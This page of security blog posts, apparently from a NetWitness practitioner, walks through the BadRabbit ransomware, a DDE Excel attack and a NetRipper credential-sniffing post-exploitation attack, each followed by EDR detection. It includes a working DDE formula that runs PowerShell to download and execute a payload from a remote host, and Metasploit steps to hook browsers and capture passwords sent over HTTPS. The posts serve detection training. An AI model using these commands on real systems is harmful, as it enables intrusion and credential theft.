Articles, Blog Posts and Webinars

Webinars & Events

  • RSA: Log4Shell Attack Simulation & Response with NDR
  • RSA: Tips for Effective Threat Hunting
  • EuroOne CyberSecurity Summit: The SolarWinds Breach: The Tale of a Supply Chain Attack
  • MENA ISC: Improving the effectiveness of the SOC by operationalizing Threat Hunting & Incident Response

Blog Posts

BadRabbit

BadRabbit is a new ransomware that has been spreading across Eastern Europe.

Once a machine is infected, the malware tries to spread laterally via SMB and by trying to dump passwords using mimikatz.

It will then encrypt documents on the local machine, modify the MBR and reboot the machine making it impossible to boot without paying the ransom.

 

The following are examples of the visibility an enterprise that has RSA NetWitness Endpoint and Packets would have when a machine gets infected.

 

1st, from the perspective of RSA NetWitness packets, it is possible to see the SMB traffic generated by the infected machine, trying to login using a set of hard coded usernames and passwords (full list available here: BadRabbit credential dictionary – Pastebin.com ).

netwitness-smb

 

From the perspective of RSA NetWitness Endpoint, we can see the following:

We can identify the modules part of the attack.

modules

– B4DD.tmp is a version of mimikatz to dump passwords using lsass.exe

– cscc.dat is a valid tool used for the encryption

– shutdown.exe is used by the malware to restart the machine

 

By analyzing those modules we can get bit more details.

For example, by analyzing dispci.exe we can see the extensions it looks for encryption:

extensions

As well as some of the encryption/decryption messages that would eventually popup to the user:

messages-discpci

 

If we then look  at the triggered IIOCs and behaviors:

iiocs

1- The malware is reading a large number of documents in a short period of time (typical ransomware behavior)

2- Reported as malicious by the reputation service (Reversing Labs)

 

If we want to look at more details for what has happened, we can look at the tracking data:

tracking1.PNG

1- the different modules needed by the malware are dropped to disk

2- it removes any previous tasks installed by the malware (notice the name of the tasks referencing the names of the dragons in Game of Thrones)

3- new scheduled tasks are added to run the encryption with the victim’s ID and then shutdown the machine

4- we then see B4DD.tmp (mimikatz) accessing lsass.exe to try and dump credentials

5- it then access all the documents with extensions that matches to get encrypted

 

tracking2

6- it then deletes logs and events

7- and finally removes/adds scheduled tasks to restart the machine

 

Once the machine gets restarted, the victim is not able to boot to Windows and gets the following message:

Capture

 

This shows how RSA NetWitness Packets and Endpoint can help get early notification and detection for new breeds of malware without relying on known signatures, and how they can be used to easily look for IOCs and indicators to quickly respond and identify compromised machines.

MS Excel Command Execution Without Macros

There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other office documents) without the need of Macros.

The method uses Dynamic Data Exchange (DDE), and what makes it interesting is that, even though it does causes prompt messages to appear, it doesn’t use Macros and therefore it is less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a “feature” and not a vulnerability, it is not something that will be patched, and cannot be easily prevented and blocked.

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

 

 

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:

=cmd|’ /c notepad’!A0

Once the user opens the file and accepts the prompts, notepad.exe will be launched.

To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload “YGH.exe” is hosted on the “192.168.1.3” server):

=cmd|’/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\”http://192.168.1.3/YGH.exe\”,\”c:\\Users\Public\\YGH.exe\”);Start-Process \”c:\\Users\\Public\\YGH.exe\”‘!A0

 

Once the victim opens the file, this is what he sees:

 

After accepting the 1st warning message, he sees a 2nd warning:

 

And finally the payload gets downloaded and executed:

In a real life scenario, the malware would have done something more stealthy, or provided remote access to the attacker instead of displaying a message.

 

 

 

Detection Using RSA NetWitness Endpoint (EDR)

Now, from the RSA NetWitness Endpoint view, this would be detected very easily.

  1. IIOCs are triggered for Office running PowerShell and PowerShell downloading content. This could be used to generate real-time alerts via email and/or Syslog and get notified at an early stage of the attack.
  2. Excel is executed
  3. Excel launches “cmd.exe”. From the command arguments we can see that cmd is used to launch powershell to download and execute a file called “YGH.exe” from the “192.168.1.3” server.
  4. PowerShell saves the YGH.exe file to disk
  5. PowerShell executed the YGH.exe file

 

 

This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user’s workstation.

This has been detected even though Excel is an approved software with a valid trusted signature and the malware itself didn’t perform any malicious activity (it only shows a message to the victim). It demonstrates early detection capabilities based on behavior before negative impact actually happens.

Post Exploitation – Sniff a Target’s Encrypted Traffic in Clear-Text

NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

Basically, this can allow the attacker to sniff HTTPS and SSH traffic from his target in clear-text. This can help the attacker acquire additional information, such as usernames and passwords from the user once he authenticates to web applications (over HTTPS) or network devices (over SSH).

In this example we will see how to perform this attack using NetRipper (assuming that the attacker already has a meterpreter shell), and then see how an EDR tool such as RSA NetWitness Endpoint can help in detecting such attacks.

 

We are using:
– Kali Linux as the Attacker’s machine
– Windows 7 with McAfee Antivirus as the victim (the same technique would work on Windows 10 as well)

 

Installation of NetRipper for Metasploit on Kali

Run the following commands on the Kali box to install NetRipper and make it available within Metasploit.

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

g++ -Wall netripper.cpp -o netripper

cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper

cd ../Release

cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll‍‍‍‍‍‍

 

Launch the Attack

We will assume that the attacker already has a meterpreter shell.

01-meterpreter shell

 

The attacker can connect to the available session using “sessions -i 1” and he can then list running processes using “ps”

02-ps processes

From here he can identify that firefox.exe and putty.exe are currently running.

 

The attacker will now decide to use NetRipper to sniff network traffic from firefox in clear-text, even when HTTPS is used.
He will load NetRipper by using the following command: use post/windows/gather/netripper
He can list the options needed with: show options

03-use netripper

 

The attacker needs to:
– set the session ID to use (session 1 from the list of available sessions): set SESSION 1
– set the process names or process IDs he wants to hook to: set PROCESSNAMES firefox.exe,putty.exe

He can then launch the exploit using: exploit

04-exploit

 

Now that the hooks are set, NetRipper will sniff the traffic for those processes in clear-text and save the content on the victim’s machine, by default under the current user’s TEMP folder (can be changed with the DATAPATH option).

07-list folder

 

The victim will now try to authenticate to a web application over HTTPS. In this example we will use GMail, but it could be anything.

06-gmail-password.PNG

 

Now the attacker will read the content of the firefox.exe_PR_Write.txt file. Even though the victim is using HTTPS, the attacker is able to see both the username (someone@gmail.com) and the password (password123) of the victim in clear-text.

08-output.PNG

The same could be done with Chrome, Putty, SecureCRT, WinSCP, Lync, Outlook …
It is also not limited to login information, but to anything sent or received by the process.

 

 

Detection Using an EDR Solution

Now that we have seen how easily an attacker can sniff encrypted traffic from the user via process hooking, bypassing the victim’s antivirus, we will now see how to detect it using an EDR solution such as RSA NetWitness Endpoint.

In the below screenshot, we can see how RSA NWE detects:
– the hooked process (firefox.exe)
– the hooked module names
– the hooked symbols
– an elevated IIOC Score
– the list IIOCs that have been triggered

08-ECAT-IIOC.PNG

In addition, by analyzing the module and doing static analysis, we can see references to NetRipper and to the files and folders used by the tool.

09-ECAT-Analyze.PNG

 

From SQL Injection to WebShell

An SQL Injection attack is not only limited to dumping a database, but can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells can receive commands from the attackers mainly using 2 methods:

  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs

In this tutorial we will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.

Continue reading

Fileless Infection Using Metasploit and PowerShell

Fileless malware is a method used to compromise a system without writing any file to disk. This allows to remain stealthy and avoid detection from some antiviruses, EPP and EDR solutions.

We will look at how to test this type of attack and then at ways to detect it.

Continue reading